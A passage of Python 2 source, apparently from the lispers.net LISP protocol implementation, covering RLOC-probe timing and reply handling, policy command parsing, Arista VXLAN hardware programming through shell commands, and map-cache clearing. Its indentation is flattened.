r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID conifgured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-deivce (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for comes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probe
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
glean, do_probe, y = lisp_allow_gleaning(eid, None, parent_rloc)
if (glean and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but differnet translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
#
# Copy last-rloc send probe timer, so all EIDs using the
# same RLOC can have sync'ed rtts.
#
parent_rloc.last_rloc_probe = last_rloc.last_rloc_probe
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending RLOC probe if we just a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr= red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reisntall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# conditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if RTR address is in LISP the lisp-itr process learned from the
# map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_entry, source, port, map_reply, ttl,
mrloc):
rloc = rloc_entry.rloc
nonce = map_reply.nonce
hc = map_reply.hop_count
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
jt = rloc_entry.json.json_string if rloc_entry.json else None
ts = lisp_get_timestamp()
#
# If this RLOC-probe reply is in response to a RLOC-probe request to a
# multicast RLOC, then store all responses. Create a lisp_rloc() for new
# entries.
#
if (mrloc != None):
multicast_rloc = mrloc.rloc.print_address_no_iid()
if (mrloc.multicast_rloc_probe_list.has_key(map_reply_addr) == False):
nrloc = lisp_rloc()
nrloc = copy.deepcopy(mrloc)
nrloc.rloc.copy_address(rloc)
nrloc.multicast_rloc_probe_list = {}
mrloc.multicast_rloc_probe_list[map_reply_addr] = nrloc
#endif
nrloc = mrloc.multicast_rloc_probe_list[map_reply_addr]
nrloc.last_rloc_probe_nonce = mrloc.last_rloc_probe_nonce
nrloc.last_rloc_probe = mrloc.last_rloc_probe
r, eid, group = lisp_rloc_probe_list[multicast_rloc][0]
nrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
mrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
return
#endif
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sending sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr):
if (rloc.translated_port != 0 and rloc.translated_port != port):
continue
#endif
#endif
rloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endif
return(count)
#endif
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of [datetime, lisp_packet]. This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address an associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configure with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list, lisp_gleaned_groups
global lisp_no_map_request_rate_limit
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Clear rate-limiting temporarily.
#
lisp_no_map_request_rate_limit = lisp_get_timestamp()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Clear gleaned groups data structure.
#
lisp_gleaned_groups = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulated with a source-port of 4341
# and a destination adddress and port that was translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
